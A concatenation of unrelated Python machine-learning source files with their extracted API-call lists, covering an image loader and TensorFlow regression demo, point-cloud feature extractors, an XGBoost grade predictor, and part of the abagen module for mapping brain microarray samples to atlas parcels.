"DATASET_SPLITS['MNIST']['train']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['MNIST'], DATASET_SPLITS['MNIST'\n ]['train'])\n", (8279, 8358), False, 'import os\n'), ((8398, 8488), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['MNIST']", "DATASET_SPLITS['MNIST']['test']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['MNIST'], DATASET_SPLITS['MNIST'\n ]['test'])\n", (8410, 8488), False, 'import os\n'), ((8529, 8620), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_SPLITS['EI339']['train']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_SPLITS['EI339'\n ]['train'])\n", (8541, 8620), False, 'import os\n'), ((8660, 8750), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_SPLITS['EI339']['test']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_SPLITS['EI339'\n ]['test'])\n", (8672, 8750), False, 'import os\n'), ((8794, 8897), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['MNIST+EI339']", "DATASET_SPLITS['MNIST+EI339']['train']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['MNIST+EI339'], DATASET_SPLITS[\n 'MNIST+EI339']['train'])\n", (8806, 8897), False, 'import os\n'), ((8940, 9042), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['MNIST+EI339']", "DATASET_SPLITS['MNIST+EI339']['test']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['MNIST+EI339'], DATASET_SPLITS[\n 'MNIST+EI339']['test'])\n", (8952, 9042), False, 'import os\n'), ((9113, 9180), 'torchvision.datasets.MNIST', 'torchvision.datasets.MNIST', (['CRT_ABS_PATH'], {'train': '(True)', 'download': '(True)'}), '(CRT_ABS_PATH, train=True, download=True)\n', (9139, 9180), False, 'import torchvision\n'), ((9189, 9257), 'torchvision.datasets.MNIST', 'torchvision.datasets.MNIST', (['CRT_ABS_PATH'], {'train': '(False)', 'download': '(True)'}), '(CRT_ABS_PATH, train=False, download=True)\n', (9215, 9257), False, 'import torchvision\n'), ((10262, 10282), 'torch.is_tensor', 'torch.is_tensor', (['idx'], {}), '(idx)\n', (10277, 10282), False, 'import torch\n'), ((290, 312), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (310, 312), False, 'import inspect\n'), ((3575, 3615), 'os.path.join', 'os.path.join', (['abs_path_to_tr_files', 'file'], {}), '(abs_path_to_tr_files, file)\n', (3587, 3615), False, 'import os\n'), ((3830, 3868), 'os.path.join', 'os.path.join', (['path_to_test_files', 'file'], {}), '(path_to_test_files, file)\n', (3842, 3868), False, 'import os\n'), ((6398, 6427), 
'torch.from_numpy', 'torch.from_numpy', (['train_label'], {}), '(train_label)\n', (6414, 6427), False, 'import torch\n'), ((6767, 6795), 'torch.from_numpy', 'torch.from_numpy', (['test_label'], {}), '(test_label)\n', (6783, 6795), False, 'import torch\n'), ((7356, 7376), 'os.path.exists', 'os.path.exists', (['file'], {}), '(file)\n', (7370, 7376), False, 'import os\n'), ((9798, 9819), 'torch.load', 'torch.load', (['data_file'], {}), '(data_file)\n', (9808, 9819), False, 'import torch\n'), ((2528, 2554), 'numpy.load', 'np.load', (['abs_train_data_fn'], {}), '(abs_train_data_fn)\n', (2535, 2554), True, 'import numpy as np\n'), ((2556, 2583), 'numpy.load', 'np.load', (['abs_train_label_fn'], {}), '(abs_train_label_fn)\n', (2563, 2583), True, 'import numpy as np\n'), ((2604, 2629), 'numpy.load', 'np.load', (['abs_test_data_fn'], {}), '(abs_test_data_fn)\n', (2611, 2629), True, 'import numpy as np\n'), ((2631, 2657), 'numpy.load', 'np.load', (['abs_test_label_fn'], {}), '(abs_test_label_fn)\n', (2638, 2657), True, 'import numpy as np\n'), ((9967, 9988), 'torch.load', 'torch.load', (['data_file'], {}), '(data_file)\n', (9977, 9988), False, 'import torch\n'), ((10139, 10160), 'torch.load', 'torch.load', (['data_file'], {}), '(data_file)\n', (10149, 10160), False, 'import torch\n'), ((11157, 11190), 'torchvision.transforms.ToTensor', 'torchvision.transforms.ToTensor', ([], {}), '()\n', (11188, 11190), False, 'import torchvision\n'), ((11204, 11258), 'torchvision.transforms.Normalize', 'torchvision.transforms.Normalize', (['(0.1307,)', '(0.3081,)'], {}), '((0.1307,), (0.3081,))\n', (11236, 11258), False, 'import torchvision\n')]
|
# -*- coding: utf-8 -*-
import cv2
import os
import numpy as np
from sklearn.model_selection import train_test_split
import random
import tensorflow as tf
def read_data(img_path, image_h = 64, image_w = 64):
image_data = []
label_data = []
image = cv2.imread(img_path)
#cv2.namedWindow("Image")
#cv2.imshow("Image",image)
#cv2.waitKey(0)
    # pad the shorter side with black borders so the image becomes square,
    # then resize to (image_h, image_w) below
    h, w, _ = image.shape
    longest_edge = max(h, w)
top, bottom, left, right = (0, 0, 0, 0)
dh,dw = (0,0)
if h < longest_edge:
dh = longest_edge - h
top = dh // 2
bottom = dh - top
elif w < longest_edge:
dw = longest_edge - w
left = dw // 2
right = dw - left
else:
pass
image_pad = cv2.copyMakeBorder(image, top, bottom, left, right, cv2.BORDER_CONSTANT, value=[0, 0, 0])
image = cv2.resize(image_pad, (image_h, image_w))
image_data.append(image)
label_data.append(img_path)
image_data = np.array(image_data)
train_x, test_x, train_y, test_y = train_test_split(image_data, label_data, test_size=0.05,
random_state=random.randint(0, 100))
X = tf.placeholder(tf.float32,[None, 64, 64, 3])
Y = tf.placeholder(tf.float32, [None, 2])
return Y
#img_path = '4833.jpg'
#print(read_data(img_path))
x_data = np.float32(np.random.rand(2,100))
y_data = np.dot([0.100, 0.200], x_data) + 0.300
b = tf.Variable(tf.zeros([1]), name='B')
W = tf.Variable(tf.random_uniform([1, 2], -1.0, 1.0), name='W')
y = tf.add(tf.matmul(W, x_data, name='MatMul'), b ,name='add')
loss = tf.reduce_mean(tf.square(tf.subtract(y, y_data, name='Sub'), name='Square'), name='ReduceMean')
optimizer = tf.train.GradientDescentOptimizer(0.001, name='Optimizer')
train = optimizer.minimize(loss, name='minimize')
summaries = [tf.summary.histogram('W',W), tf.summary.histogram('b', b), tf.summary.scalar('loss', loss)]
summary_op = tf.summary.merge(summaries)
print(summary_op)
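# Illustrative sketch (not in the original script): actually run a few training
# steps and write the merged summaries. Assumes TensorFlow 1.x, which the
# tf.placeholder / tf.train APIs above already require; the './logs' directory
# is a hypothetical choice.
with tf.Session() as sess:
    writer = tf.summary.FileWriter('./logs', sess.graph)
    sess.run(tf.global_variables_initializer())
    for step in range(201):
        _, summary = sess.run([train, summary_op])
        writer.add_summary(summary, step)
        if step % 50 == 0:
            print(step, sess.run(W), sess.run(b))
    writer.close()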
|
[
"tensorflow.random_uniform",
"numpy.dot",
"tensorflow.summary.scalar",
"tensorflow.subtract",
"random.randint",
"cv2.copyMakeBorder",
"cv2.imread",
"tensorflow.placeholder",
"tensorflow.zeros",
"numpy.array",
"tensorflow.matmul",
"tensorflow.summary.histogram",
"numpy.random.rand",
"tensorflow.train.GradientDescentOptimizer",
"tensorflow.summary.merge",
"cv2.resize"
] |
[((1750, 1808), 'tensorflow.train.GradientDescentOptimizer', 'tf.train.GradientDescentOptimizer', (['(0.001)'], {'name': '"""Optimizer"""'}), "(0.001, name='Optimizer')\n", (1783, 1808), True, 'import tensorflow as tf\n'), ((1982, 2009), 'tensorflow.summary.merge', 'tf.summary.merge', (['summaries'], {}), '(summaries)\n', (1998, 2009), True, 'import tensorflow as tf\n'), ((271, 291), 'cv2.imread', 'cv2.imread', (['img_path'], {}), '(img_path)\n', (281, 291), False, 'import cv2\n'), ((753, 846), 'cv2.copyMakeBorder', 'cv2.copyMakeBorder', (['image', 'top', 'bottom', 'left', 'right', 'cv2.BORDER_CONSTANT'], {'value': '[0, 0, 0]'}), '(image, top, bottom, left, right, cv2.BORDER_CONSTANT,\n value=[0, 0, 0])\n', (771, 846), False, 'import cv2\n'), ((856, 897), 'cv2.resize', 'cv2.resize', (['image_pad', '(image_h, image_w)'], {}), '(image_pad, (image_h, image_w))\n', (866, 897), False, 'import cv2\n'), ((981, 1001), 'numpy.array', 'np.array', (['image_data'], {}), '(image_data)\n', (989, 1001), True, 'import numpy as np\n'), ((1202, 1247), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[None, 64, 64, 3]'], {}), '(tf.float32, [None, 64, 64, 3])\n', (1216, 1247), True, 'import tensorflow as tf\n'), ((1256, 1293), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[None, 2]'], {}), '(tf.float32, [None, 2])\n', (1270, 1293), True, 'import tensorflow as tf\n'), ((1386, 1408), 'numpy.random.rand', 'np.random.rand', (['(2)', '(100)'], {}), '(2, 100)\n', (1400, 1408), True, 'import numpy as np\n'), ((1419, 1445), 'numpy.dot', 'np.dot', (['[0.1, 0.2]', 'x_data'], {}), '([0.1, 0.2], x_data)\n', (1425, 1445), True, 'import numpy as np\n'), ((1477, 1490), 'tensorflow.zeros', 'tf.zeros', (['[1]'], {}), '([1])\n', (1485, 1490), True, 'import tensorflow as tf\n'), ((1519, 1555), 'tensorflow.random_uniform', 'tf.random_uniform', (['[1, 2]', '(-1.0)', '(1.0)'], {}), '([1, 2], -1.0, 1.0)\n', (1536, 1555), True, 'import tensorflow as tf\n'), ((1579, 1614), 'tensorflow.matmul', 'tf.matmul', (['W', 'x_data'], {'name': '"""MatMul"""'}), "(W, x_data, name='MatMul')\n", (1588, 1614), True, 'import tensorflow as tf\n'), ((1876, 1904), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""W"""', 'W'], {}), "('W', W)\n", (1896, 1904), True, 'import tensorflow as tf\n'), ((1905, 1933), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""b"""', 'b'], {}), "('b', b)\n", (1925, 1933), True, 'import tensorflow as tf\n'), ((1935, 1966), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""loss"""', 'loss'], {}), "('loss', loss)\n", (1952, 1966), True, 'import tensorflow as tf\n'), ((1666, 1700), 'tensorflow.subtract', 'tf.subtract', (['y', 'y_data'], {'name': '"""Sub"""'}), "(y, y_data, name='Sub')\n", (1677, 1700), True, 'import tensorflow as tf\n'), ((1169, 1191), 'random.randint', 'random.randint', (['(0)', '(100)'], {}), '(0, 100)\n', (1183, 1191), False, 'import random\n')]
|
import logging
import os
from abc import ABC
import gin
import MinkowskiEngine as ME
import numpy as np
import open3d as o3d
import torch
from src.models import get_model
class BaseFeatureExtractor(ABC):
def __init__(self):
logging.info(f"Initialize {self.__class__.__name__}")
def extract_feature(self, xyz):
raise NotImplementedError("Feature should implement extract_feature method.")
@gin.configurable()
class FCGF(BaseFeatureExtractor):
def __init__(self, voxel_size, checkpoint_path, device):
super().__init__()
self.voxel_size = voxel_size
self.device = device
assert os.path.exists(checkpoint_path), f"{checkpoint_path} not exists"
MODEL = get_model("ResUNetBN2C")
feat_model = MODEL(
1, 32, bn_momentum=0.05, conv1_kernel_size=7, normalize_feature=True
).to(device)
checkpoint = torch.load(checkpoint_path)
feat_model.load_state_dict(checkpoint["state_dict"])
self.feat_model = feat_model
self.feat_model.eval()
def freeze(self):
for param in self.feat_model.parameters():
param.requires_grad = False
def extract_feature(self, xyz, coords=None, feats=None):
if coords is None or feats is None:
# quantize input xyz.
coords, sel = ME.utils.sparse_quantize(
xyz / self.voxel_size, return_index=True
)
# make sparse tensor.
coords = ME.utils.batched_coordinates([coords])
feats = torch.ones((coords.shape[0], 1)).float()
sinput = ME.SparseTensor(
feats.to(self.device), coordinates=coords.to(self.device)
)
if isinstance(xyz, np.ndarray):
xyz = torch.from_numpy(xyz)
xyz = xyz[sel].float().to(self.device)
else:
sinput = ME.SparseTensor(coordinates=coords, features=feats)
# extract feature.
F = self.feat_model(sinput).F
return F, xyz
@gin.configurable()
class FPFH(BaseFeatureExtractor):
    def __init__(self, voxel_size, device):
        # BaseFeatureExtractor.__init__ takes no arguments; store the settings
        # that extract_feature() relies on.
        super().__init__()
        self.voxel_size = voxel_size
        self.device = device
def extract_feature(self, xyz):
voxel_size = self.voxel_size
if isinstance(xyz, torch.Tensor):
xyz = xyz.numpy()
# downsample
pcd = o3d.geometry.PointCloud()
pcd.points = o3d.utility.Vector3dVector(xyz)
pcd = pcd.voxel_down_sample(voxel_size)
# calculate normals
radius_normal = voxel_size * 2.0
pcd.estimate_normals(
o3d.geometry.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=30)
)
# calculate features
radius_feature = voxel_size * 5.0
pcd_fpfh = o3d.pipelines.registration.compute_fpfh_feature(
pcd, o3d.geometry.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=100)
)
xyz = torch.from_numpy(np.asarray(pcd.points)).float()
F = torch.from_numpy(pcd_fpfh.data.copy().T).float().contiguous()
return F, xyz
MODELS = [FPFH, FCGF]
@gin.configurable()
def get_feature(name):
# Find the model class from its name
all_models = MODELS
mdict = {model.__name__: model for model in all_models}
if name not in mdict:
logging.info(f"Invalid model index. You put {name}. Options are:")
# Display a list of valid model names
for model in all_models:
logging.info("\t* {}".format(model.__name__))
return None
NetClass = mdict[name]
return NetClass
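def _example_usage():
    """Illustrative sketch only (not part of the original module): resolve a
    feature extractor through `get_feature` and run it on a random point cloud.
    The voxel size and device below are hypothetical values, not project defaults."""
    NetClass = get_feature("FPFH")
    extractor = NetClass(voxel_size=0.05, device="cpu")
    xyz = np.random.rand(2048, 3)  # toy point cloud in the unit cube
    feats, down_xyz = extractor.extract_feature(xyz)
    print(feats.shape, down_xyz.shape)  # FPFH descriptors are 33-dimensional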
|
[
"torch.ones",
"MinkowskiEngine.SparseTensor",
"torch.load",
"MinkowskiEngine.utils.sparse_quantize",
"os.path.exists",
"open3d.geometry.PointCloud",
"numpy.asarray",
"logging.info",
"open3d.geometry.KDTreeSearchParamHybrid",
"gin.configurable",
"MinkowskiEngine.utils.batched_coordinates",
"src.models.get_model",
"open3d.utility.Vector3dVector",
"torch.from_numpy"
] |
[((420, 438), 'gin.configurable', 'gin.configurable', ([], {}), '()\n', (436, 438), False, 'import gin\n'), ((2034, 2052), 'gin.configurable', 'gin.configurable', ([], {}), '()\n', (2050, 2052), False, 'import gin\n'), ((3102, 3120), 'gin.configurable', 'gin.configurable', ([], {}), '()\n', (3118, 3120), False, 'import gin\n'), ((240, 293), 'logging.info', 'logging.info', (['f"""Initialize {self.__class__.__name__}"""'], {}), "(f'Initialize {self.__class__.__name__}')\n", (252, 293), False, 'import logging\n'), ((642, 673), 'os.path.exists', 'os.path.exists', (['checkpoint_path'], {}), '(checkpoint_path)\n', (656, 673), False, 'import os\n'), ((724, 748), 'src.models.get_model', 'get_model', (['"""ResUNetBN2C"""'], {}), "('ResUNetBN2C')\n", (733, 748), False, 'from src.models import get_model\n'), ((900, 927), 'torch.load', 'torch.load', (['checkpoint_path'], {}), '(checkpoint_path)\n', (910, 927), False, 'import torch\n'), ((2358, 2383), 'open3d.geometry.PointCloud', 'o3d.geometry.PointCloud', ([], {}), '()\n', (2381, 2383), True, 'import open3d as o3d\n'), ((2405, 2436), 'open3d.utility.Vector3dVector', 'o3d.utility.Vector3dVector', (['xyz'], {}), '(xyz)\n', (2431, 2436), True, 'import open3d as o3d\n'), ((3303, 3369), 'logging.info', 'logging.info', (['f"""Invalid model index. You put {name}. Options are:"""'], {}), "(f'Invalid model index. You put {name}. Options are:')\n", (3315, 3369), False, 'import logging\n'), ((1337, 1403), 'MinkowskiEngine.utils.sparse_quantize', 'ME.utils.sparse_quantize', (['(xyz / self.voxel_size)'], {'return_index': '(True)'}), '(xyz / self.voxel_size, return_index=True)\n', (1361, 1403), True, 'import MinkowskiEngine as ME\n'), ((1490, 1528), 'MinkowskiEngine.utils.batched_coordinates', 'ME.utils.batched_coordinates', (['[coords]'], {}), '([coords])\n', (1518, 1528), True, 'import MinkowskiEngine as ME\n'), ((1890, 1941), 'MinkowskiEngine.SparseTensor', 'ME.SparseTensor', ([], {'coordinates': 'coords', 'features': 'feats'}), '(coordinates=coords, features=feats)\n', (1905, 1941), True, 'import MinkowskiEngine as ME\n'), ((2597, 2666), 'open3d.geometry.KDTreeSearchParamHybrid', 'o3d.geometry.KDTreeSearchParamHybrid', ([], {'radius': 'radius_normal', 'max_nn': '(30)'}), '(radius=radius_normal, max_nn=30)\n', (2633, 2666), True, 'import open3d as o3d\n'), ((2834, 2905), 'open3d.geometry.KDTreeSearchParamHybrid', 'o3d.geometry.KDTreeSearchParamHybrid', ([], {'radius': 'radius_feature', 'max_nn': '(100)'}), '(radius=radius_feature, max_nn=100)\n', (2870, 2905), True, 'import open3d as o3d\n'), ((1782, 1803), 'torch.from_numpy', 'torch.from_numpy', (['xyz'], {}), '(xyz)\n', (1798, 1803), False, 'import torch\n'), ((1549, 1581), 'torch.ones', 'torch.ones', (['(coords.shape[0], 1)'], {}), '((coords.shape[0], 1))\n', (1559, 1581), False, 'import torch\n'), ((2947, 2969), 'numpy.asarray', 'np.asarray', (['pcd.points'], {}), '(pcd.points)\n', (2957, 2969), True, 'import numpy as np\n')]
|
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from xgboost import XGBRegressor
import os
from django.conf import settings
import numpy as np
from functools import lru_cache
RANDOM_STATE = 42
def get_path(course, file):
return os.path.join(settings.PROJECT_ROOT, '..', 'pandas_api', 'static', 'mit', course, file)
@lru_cache(maxsize=32)
def load_data(course):
# Loading the final grade and the student list
final_grades = pd.read_csv(get_path(course, 'final_grades.csv'), index_col='user_id')
course_feature = pd.read_csv(get_path(course, 'coursewised_feature.csv'),
index_col='user_id').fillna(0)
# cg = pd.read_csv(get_path(course, 'chapter_grades.csv'))
# cg = cg.pivot(index='user_id', columns='chapter_mid', values='chgrade').fillna(0)
cv = pd.read_csv(get_path(course, 'chapter_videos.csv'))
cv = cv.pivot(index='user_id', columns='chapter_name', values='video_count').fillna(0)
# note that the above dfs have same index 'user_id'
# # merge the course_videos and course_grades
# features = \
# cg.join(cv, on=None, how='outer', lsuffix='_grade', rsuffix='_video_count').fillna(0)
features = cv
# full outer join on cv.user_id = course_feature.user_id
features = features.join(course_feature, how='outer').fillna(0)
# final_grades is y-data => left outer join on final_grades.user_id = features.user_id
df = final_grades.join(features, how='left').fillna(0)
# exclude the 'final_grade' and 'nproblem_check'
X = df.drop(['final_grade', 'nproblem_check', 'username'], axis=1)
y = df['final_grade']
return X, y
def get_user_chapter_grades(course, user_id):
chapter_grade = pd.read_csv(get_path(course, 'chapter_grade.csv'), index_col=['user_id', 'chapter_id'])
result = []
for chapter_id, chapter_grade in chapter_grade.loc[user_id]['chapter_grade'].iteritems():
result.append({"name": "Chapter "+str(chapter_id), "score": chapter_grade})
return result
def main():
course = 'VJx__VJx_2__3T2016'
filename = 'model.xgb'
X, y = load_data(course)
# Normalization
scaler = MinMaxScaler()
scaler.fit(X)
X = scaler.transform(X)
model = XGBRegressor()
if os.path.isfile(filename):
model.load_model(filename)
else:
model.fit(X, y)
model.save_model(filename)
y_ = model.predict(X)
print(y_)
model_cache = {}
data_transformer = {}
def predict(course_code, user_id):
filename = get_path(course_code, '%s_model.xgb' % course_code)
X, y = load_data(course_code)
user_X = X.loc[user_id]
# Normalization
if course_code not in data_transformer:
scaler = MinMaxScaler()
scaler.fit(X)
data_transformer[course_code] = scaler
scaler = data_transformer[course_code]
if course_code not in model_cache:
model = XGBRegressor()
if os.path.isfile(filename):
model.load_model(filename)
else:
X = scaler.transform(X)
model.fit(X, y)
model.save_model(filename)
model_cache[course_code] = model
model = model_cache[course_code]
X = scaler.transform(X)
y_ = model.predict(X)
hist, bin_edges = np.histogram(y_, bins=10, range=[0, 1])
return {
"classFinalExamDistribution": hist.tolist(),
"myChapterScore": get_user_chapter_grades(course_code, user_id),
"myPredictedFinalExamScore": float(model.predict(user_X)[0])
}
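def _example_report():
    """Illustrative sketch only (not part of the original module): the user id
    below is a hypothetical placeholder; the course code is the one used in
    `main()`."""
    report = predict('VJx__VJx_2__3T2016', 12345)
    print(report['myPredictedFinalExamScore'])
    print(report['classFinalExamDistribution'])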
if __name__ == '__main__':
main()
|
[
"sklearn.preprocessing.MinMaxScaler",
"os.path.isfile",
"numpy.histogram",
"xgboost.XGBRegressor",
"functools.lru_cache",
"os.path.join"
] |
[((344, 365), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(32)'}), '(maxsize=32)\n', (353, 365), False, 'from functools import lru_cache\n'), ((254, 344), 'os.path.join', 'os.path.join', (['settings.PROJECT_ROOT', '""".."""', '"""pandas_api"""', '"""static"""', '"""mit"""', 'course', 'file'], {}), "(settings.PROJECT_ROOT, '..', 'pandas_api', 'static', 'mit',\n course, file)\n", (266, 344), False, 'import os\n'), ((2171, 2185), 'sklearn.preprocessing.MinMaxScaler', 'MinMaxScaler', ([], {}), '()\n', (2183, 2185), False, 'from sklearn.preprocessing import MinMaxScaler\n'), ((2245, 2259), 'xgboost.XGBRegressor', 'XGBRegressor', ([], {}), '()\n', (2257, 2259), False, 'from xgboost import XGBRegressor\n'), ((2267, 2291), 'os.path.isfile', 'os.path.isfile', (['filename'], {}), '(filename)\n', (2281, 2291), False, 'import os\n'), ((3275, 3314), 'numpy.histogram', 'np.histogram', (['y_'], {'bins': '(10)', 'range': '[0, 1]'}), '(y_, bins=10, range=[0, 1])\n', (3287, 3314), True, 'import numpy as np\n'), ((2728, 2742), 'sklearn.preprocessing.MinMaxScaler', 'MinMaxScaler', ([], {}), '()\n', (2740, 2742), False, 'from sklearn.preprocessing import MinMaxScaler\n'), ((2911, 2925), 'xgboost.XGBRegressor', 'XGBRegressor', ([], {}), '()\n', (2923, 2925), False, 'from xgboost import XGBRegressor\n'), ((2937, 2961), 'os.path.isfile', 'os.path.isfile', (['filename'], {}), '(filename)\n', (2951, 2961), False, 'import os\n')]
|
# -*- coding: utf-8 -*-
"""
Functions for mapping the AHBA microarray dataset to atlases and parcellations
in MNI space
"""
from functools import reduce
from nilearn._utils import check_niimg_3d
import numpy as np
import pandas as pd
from scipy.spatial.distance import cdist
from abagen import datasets, io, process, utils
def _assign_sample(sample, atlas, sample_info=None, atlas_info=None,
tolerance=2):
"""
Determines which parcel `sample` belongs to in `atlas`
Parameters
----------
sample : (1, 3) array_like
Coordinates (ijk) of microarray sample in `atlas` space
atlas : niimg-like object
ROI image, where each ROI should be identified with a unique
integer ID
sample_info : pandas.DataFrame
A single row of an `annotation` file, corresponding to the given sample
    atlas_info : pandas.DataFrame, optional
Dataframe containing information about the specified `atlas`. Must have
_at least_ columns 'id', 'hemisphere', and 'structure' containing
information mapping atlas IDs to hemisphere and broad structural class
(i.e., "cortex", "subcortex", "cerebellum"). Default: None
tolerance : int, optional
Distance (in mm) that a sample must be from a parcel for it to be
matched to that parcel. This is only considered if the sample is not
directly within a parcel. Default: 2
Returns
-------
label : int
Parcel label of `sample`
"""
# pull relevant info from atlas
label_data = check_niimg_3d(atlas).get_data()
# expand provided coordinates to include those w/i `tolerance` of `coords`
# set a hard euclidean distance limit to account for different voxel sizes
coords = utils.expand_roi(sample, dilation=tolerance, return_array=True)
coords = coords[cdist(sample, coords).squeeze() < tolerance]
# grab non-zero labels for expanded coordinates
possible_labels = label_data[coords[:, 0], coords[:, 1], coords[:, 2]]
nz_labels = possible_labels[possible_labels.nonzero()]
labels, counts = np.unique(nz_labels, return_counts=True)
# if atlas_info and sample_info are provided, drop potential labels who
# don't match hemisphere or structural class defined in `sample_info`
if atlas_info is not None and sample_info is not None:
for old_label in labels:
new_label = _check_label(old_label, sample_info, atlas_info)
if old_label != new_label:
nz_labels[nz_labels == old_label] = new_label
labels, counts = np.unique(nz_labels[nz_labels.nonzero()],
return_counts=True)
# if there is still nothing in the vicinity, return 0
if labels.size == 0:
return 0
# if there is only one ROI in the vicinity, use that
elif labels.size == 1:
return labels[0]
# if more than one ROI in the vicinity, return the most frequent
indmax, = np.where(counts == counts.max())
if indmax.size == 1:
return labels[indmax[0]]
# if two or more parcels tied for neighboring frequency, use ROI
# with closest centroid to `coords`
centroids = utils.get_centroids(atlas, labels)
return labels[utils.closest_centroid(sample, centroids)]
def _check_label(label, sample_info, atlas_info):
"""
Checks that `label` defined by `sample_info` is coherent with `atlas_info`
Parameters
----------
label : int
        Tentative label for sample described by `sample_info`
sample_info : pandas.DataFrame
A single row of an `annotation` file, corresponding to the given sample
    atlas_info : pandas.DataFrame
        Dataframe containing information about the atlas of interest. Must have
        _at least_ columns 'id', 'hemisphere', and 'structure' containing
        information mapping atlas IDs to hemisphere and broad structural class
        (i.e., "cortex", "subcortex", "cerebellum")
Returns
-------
label : int
New label for sample
"""
cols = ['hemisphere', 'structure']
if label != 0:
sample_info = sample_info[cols]
atlas_info = atlas_info.loc[label][cols]
if not np.all(sample_info.values == atlas_info.values):
label = 0
return label
def label_samples(annotation, atlas, atlas_info=None, tolerance=2):
"""
Matches all microarray samples in `annotation` to parcels in `atlas`
Attempts to place each sample provided in `annotation` into a parcel in
`atlas`, where the latter is a 3D niimg-like object that contains parcels
each idnetified by a unique integer ID.
The function tries to best match samples in `annotation` to parcels defined
in `atlas` by:
1. Determining if the sample falls directly within a parcel,
2. Checking to see if there are nearby parcels by slowly expanding the
search space to include nearby voxels, up to a specified distance
(specified via the `tolerance` parameter),
3. Assigning the sample to the closest parcel if there are multiple
nearby parcels, where closest is determined by the parcel centroid.
If at any step a sample can be assigned to a parcel the matching process is
terminated. If there is still no parcel for a given sample after this
process the sample is provided a label of 0.
Parameters
----------
annotation : (S, 13) pandas.DataFrame
Pre-loaded annotation information for a given AHBA donor
atlas : niimg-like object
A parcellation image in MNI space, where each parcel is identified by a
unique integer ID
atlas_info : pandas.DataFrame, optional
Filepath to or pre-loaded dataframe containing information about
`atlas`. Must have _at least_ columns 'id', 'hemisphere', and
'structure' containing information mapping atlas IDs to hemisphere and
broad structural class (i.e., "cortex", "subcortex", "cerebellum").
Default: None
tolerance : int, optional
Distance (in mm) that a sample must be from a parcel for it to be
matched to that parcel. This is only considered if the sample is not
directly within a parcel. Default: 2
Returns
-------
labels : (S, 1) pandas.DataFrame
Dataframe with parcel labels for each of `S` samples
"""
# get annotation and atlas data
annotation = io.read_annotation(annotation)
atlas = check_niimg_3d(atlas)
label_data, affine = atlas.get_data(), atlas.affine
# load atlas_info, if provided
if atlas_info is not None:
atlas_info = utils.check_atlas_info(atlas, atlas_info)
# get ijk coordinates for microarray samples and find labels
g_ijk = utils.xyz_to_ijk(annotation[['mni_x', 'mni_y', 'mni_z']], affine)
labelled_samples = label_data[g_ijk[:, 0], g_ijk[:, 1], g_ijk[:, 2]]
# if sample coordinates aren't directly inside a parcel, increment radius
# around sample up to `tolerance` to try and find nearby parcels.
# if still no parcel, then ignore this sample
for idx in np.where(labelled_samples == 0)[0]:
label, tol = labelled_samples[idx], 1
while label == 0 and tol <= tolerance:
label = _assign_sample(g_ijk[[idx]], atlas,
sample_info=annotation.iloc[idx],
atlas_info=atlas_info,
tolerance=tol)
tol += 1
labelled_samples[idx] = label
return pd.DataFrame(labelled_samples, dtype=int,
columns=['label'], index=annotation.index)
def group_by_label(microarray, sample_labels, labels=None, metric='mean'):
"""
Averages expression data in `microarray` over samples with same label
Parameters
----------
microarray : (S, G) pandas.DataFrame
Microarray expression data, where `S` is samples and `G` is genes
sample_labels : (S, 1) pandas.DataFrame
Parcel labels for `S` samples, as returned by e.g., `label_samples()`
labels : (L,) array_like, optional
All possible labels for parcellation (to account for possibility that
some parcels have NO expression data). Default: None
metric : str or func, optional
Mechanism by which to collapse across samples within a parcel. If a
str, should be in ['mean', 'median']; if a function, should be able to
accept an `N`-dimensional input and the `axis` keyword argument and
return an `N-1`-dimensional output. Default: 'mean'
Returns
-------
gene_by_label : (L, G) pandas.DataFrame
Microarray expression data
"""
# get combination function
metric = utils.check_metric(metric)
# get missing labels
if labels is not None:
missing = np.setdiff1d(labels, sample_labels)
labels = pd.DataFrame(columns=microarray.columns,
index=pd.Series(missing, name='label'))
gene_by_label = (microarray.merge(sample_labels,
left_index=True,
right_index=True)
.groupby('label')
.aggregate(metric)
.append(labels)
.drop([0])
.sort_index()
.rename_axis('label'))
return gene_by_label
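def _group_by_label_example():
    """Toy illustration (not part of the abagen API): four hypothetical samples,
    one unassigned (label 0), two in parcel 1, one in parcel 2; parcel 3 receives
    no samples so it is retained as an all-NaN row, and label 0 is dropped."""
    microarray = pd.DataFrame({'GENE_A': [1., 3., 5., 7.], 'GENE_B': [2., 4., 6., 8.]},
                              index=pd.Series([10, 11, 12, 13], name='sample_id'))
    sample_labels = pd.DataFrame({'label': [0, 1, 1, 2]},
                                 index=pd.Series([10, 11, 12, 13], name='sample_id'))
    return group_by_label(microarray, sample_labels, labels=[1, 2, 3])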
def get_expression_data(atlas, atlas_info=None, *, exact=True,
tolerance=2, metric='mean', ibf_threshold=0.5,
corrected_mni=True, reannotated=True,
return_counts=False, return_donors=False,
donors='all', data_dir=None):
"""
Assigns microarray expression data to ROIs defined in `atlas`
This function aims to provide a workflow for generating pre-processed,
    microarray expression data for arbitrary `atlas` designations. First, some
basic filtering of genetic probes is performed, including:
1. Intensity-based filtering of microarray probes to remove probes that
do not exceed a certain level of background noise (specified via the
`ibf_threshold` parameter), and
2. Selection of a single, representative probe for each gene via a
differential stability metric, wherein the probe that has the most
consistent regional variation across donors is retained.
Tissue samples are then matched to parcels in the defined `atlas` for each
donor. If `atlas_info` is provided then this matching is constrained by
both hemisphere and tissue class designation (e.g., cortical samples from
the left hemisphere are only matched to ROIs in the left cortex,
subcortical samples from the right hemisphere are only matched to ROIs in
